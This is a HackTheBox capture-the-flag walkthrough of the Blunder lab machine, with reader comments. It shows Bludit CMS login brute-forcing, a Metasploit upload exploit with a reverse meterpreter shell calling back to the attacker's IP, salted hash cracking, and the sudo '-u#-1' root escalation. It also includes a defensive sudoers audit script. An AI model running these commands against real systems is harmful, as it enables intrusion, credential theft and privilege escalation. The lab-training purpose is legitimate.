Blunder HackTheBox Walkthrough
This is the walkthrough of the Blunder HackTheBox machine. In it I will show how I exploited the machine and obtained the root flag. Before starting, a few facts about Blunder: it is a Linux machine, its maker rates its difficulty as low, and its IP address is 10.10.10.191.
Now I will show the step-by-step procedure for getting the root flag on the Blunder machine.
First of all, connect your PC to the VPN so that you can access the lab, and ping the IP 10.10.10.191 to confirm that you are connected to the Blunder machine. I started by scanning the IP address 10.10.10.191 to get some hints on where to start. Nmap, a port scanner, gave the following results.
Scanning the Machine
$nmap -sC -sV -oN scan 10.10.10.191
Only two ports open??
Let's perform a full port scan in case services are running on ports that are not among nmap's top 1000 ports. The full port scan gave the same result.
$nmap -sC -sV -p- -oN full_scan 10.10.10.191
Tip: It is a good idea to perform a full port scan during CTF hunting or penetration testing, because some open ports may not be among nmap's top 1000 ports.
Ports 21 and 80 are open, with an Apache2 web server running on port 80. After some enumeration I found that the website runs Bludit CMS, version 3.9.2, as revealed by this URL: http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2
As usual, my next step is to search for an exploit for the given CMS. I googled Bludit CMS 3.9.2 exploit and found this appropriate link. For more details, google CVE-2019-17240. searchsploit also gives this result.
There is a Metasploit module for Bludit. After opening it in Metasploit I found that it requires a password, so we need a username and password to use this module.
msf5>show info exploit/linux/http/bludit_upload_images_exec
I left it there and moved on to gather more information. Directory brute forcing with dirsearch and the directory-list-2.3-small.txt wordlist turned up nothing interesting. A hint on the HTB forum about a txt file led me to fuzz for hidden text files in the URL.
$wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100
The fuzzing found todo.txt. Reading its content at http://10.10.10.191/todo.txt suggests that fergus is a user. I added it to my notes and continued enumerating.
Tip: It is a good idea to make notes of every interesting finding as you go, because they sometimes show you how to proceed further.
Now we have a username and we need a password. Let's make our own wordlist using cewl, a well-known wordlist generator.
Creating Custom Wordlist
$cewl -d 3 -m 5 -w custom_wordlist.txt http://10.10.10.191/
Modify the script at https://rastating.github.io/bludit-brute-force-mitigation-bypass/ as follows: set username to fergus, since we want to brute force the user fergus, and set fname to the name of the custom wordlist you created with cewl, in my case custom_wordlist.txt. Save it as poc.py and run it.
So we have the credentials fergus : RolandDeschain. It's time to exploit the machine and get a remote shell back to our PC.
We have two ways to get shell.
1. Either use metasploit module or
2. Manually upload a file to the website by logging in at http://10.10.10.191/admin/ with the creds fergus : RolandDeschain and intercepting the requests with Burp Suite to modify them. For more info visit https://github.com/bludit/bludit/issues/1079.
I preferred the first because it needs little effort, and you know how lazy we are about doing things manually when an automated option exists. 🙂
Try the payload php/meterpreter_reverse_tcp instead of php/meterpreter/reverse_tcp if the latter fails to give you a proper meterpreter shell.
Getting User Shell
$ msfdb run
msf5 > search bludit
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter_reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.15.87
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
meterpreter > sysinfo
Alright, we have a meterpreter shell. I used the shell command to drop to a system shell and then upgraded it to a fully interactive Linux shell:
meterpreter > shell
$python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color
So we are in the Blunder HTB machine. Let us grab the user flag. Inside the home directory two users, hugo and shaun, are present. The user flag is in hugo's folder, but www-data has no permission to read it; only hugo does. I tried $su hugo in case hugo and fergus share a password, but the login failed, presumably because the password was incorrect. To read the user flag we have to log in as hugo. After manual enumeration I found the file users.php inside the Bludit directory, which gave hugo's password hash along with its salt.
Now we have to crack this hash. Hash identifier reported it as SHA-1.
Identify Type of Hash
I tried to crack it with the rockyou.txt wordlist but could not. So I tried the site https://cmd5.com/ and successfully cracked the hash. The password is Password120, so the credentials are hugo : Password120.
Switch user to hugo
Grab User Flag
Let's check what special permissions hugo has.
Tip: Whenever you get a shell, run $sudo -l to check what special command [*] the current user can run, then google 'how to escalate privilege using [*] command'. You may find your answer easily. For example, in this case google (ALL, !root) /bin/bash
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
Googling (ALL, !root) /bin/bash gave our privilege escalation vector in the first link: a vulnerable version of sudo. See this link.
After reading the exploit PoC we can get a root shell with a single command. Let's do it.
Getting Root Shell
$sudo -u#-1 /bin/bash
Enter hugo's password, Password120, when prompted.
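From the defender's side, the rule shape seen above, a runas list of (ALL, !root) in front of a shell, is worth flagging in any sudoers audit: it grants ALL and then subtracts root with '!', and sudoers(5) documents that such subtraction is not a reliable restriction, which is exactly what the `sudo -u#-1` step above demonstrates. The following Python script is an added example, not part of the original walkthrough; it parses a constructed `sudo -l` output shaped like the one quoted above (the sample text and the SHELLS set are my assumptions) and reports rules with that shape.

```python
import re

# Constructed sample shaped like the `sudo -l` output quoted in the walkthrough;
# the second and third rules are made up to show lines that should not be flagged.
SAMPLE_SUDO_L = """\
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (hugo : hugo) /usr/bin/less /var/log/apache2/access.log
"""

# A privilege line is "(runas_users [: runas_groups]) [TAG: ...] command".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}  # assumed list


def parse_rules(text):
    """Return (runas_users, tags, command) for every privilege line in sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = m.group("runas").split(":")[0]  # drop the optional runas group part
        users = [u.strip() for u in runas_users.split(",") if u.strip()]
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append((users, tags, m.group("cmd").strip()))
    return rules


def relies_on_negation(users):
    """True when the runas list grants ALL and then subtracts users with '!'.
    sudoers(5) documents that such subtraction is not reliable; the walkthrough's
    `sudo -u#-1` against (ALL, !root) is one case where the check is sidestepped."""
    return "ALL" in users and any(u.startswith("!") for u in users)


def audit(text):
    """Return human-readable findings for the risky rules in sudo -l output."""
    findings = []
    for users, _tags, cmd in parse_rules(text):
        if relies_on_negation(users):
            findings.append(f"{cmd}: runas list ({', '.join(users)}) relies on '!' negation; "
                            "name the permitted target users explicitly instead")
        if cmd.split()[0] in SHELLS:
            findings.append(f"{cmd}: rule grants an interactive shell as another user")
    return findings
```

Running audit(SAMPLE_SUDO_L) reports two findings, both for the /bin/bash rule, and nothing for the two made-up rules.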
Grab Root Flag
Grab the root flag from the root folder.
This is how I got root on the Blunder HackTheBox machine. I hope you have learned something from my approach. If you have any issue or question, please let me know at [email protected] or in the comment section. Thanks for reading this walkthrough.
For more HackTheBox walkthroughs, visit ethicalhacs.com.
This Post Has 10 Comments
Please post walkthroughs for other boxes too! Your website is a great help when I'm stuck somewhere.
Thanks bro. I am working on it.
Hey bro, I did pretty much everything; only the password hash cracking is giving me a problem because cmd5.com is Chinese. I tried cmd5.org and many other SHA-1 decrypters but no luck. Any ideas?
Alternatively, you can get a crackable hash with
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
and try to crack the hash at crackstation.net.
Hi, this cracking procedure didn't work. I tried with crackstation and cmd5.com and it was not cracked; I think it is something with the salt position.
Could you please show us the format that you put in cmd5.com?
Thanks and regards,
The format is sha1($Salt.$Pass), and this hash is not present on crackstation.net. There is also another hash present in www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php. This hash is without salt and can be cracked easily at crackstation.net.
Hey! Thanks for the walkthrough. Can you please explain "sudo -u#-1 /bin/bash", or give any resources?
I have just taken this exploit from https://www.exploit-db.com/exploits/47502. For more info on Linux privilege escalation using sudo rights you can check out this link.
Hi, I am currently slightly stuck on the meterpreter shell upgrade to a system shell. I tried different payloads and still am not able to proceed further. I am only getting this:
meterpreter > shell
Process 2740 created.
Channel 0 created.
I think that when a new channel is created it means you have a shell session open, and you can interact with this session using normal commands. You may or may not get a shell prompt after running the shell command in meterpreter, but normal Linux commands should always work in a typical shell session created by meterpreter, which is the case above. Try running some basic Linux commands like whoami, id, ls, etc. to confirm whether you are able to run commands or not. If you get output from the command, then use python -c 'import pty;pty.spawn("/bin/bash")' to upgrade the shell to one with a prompt.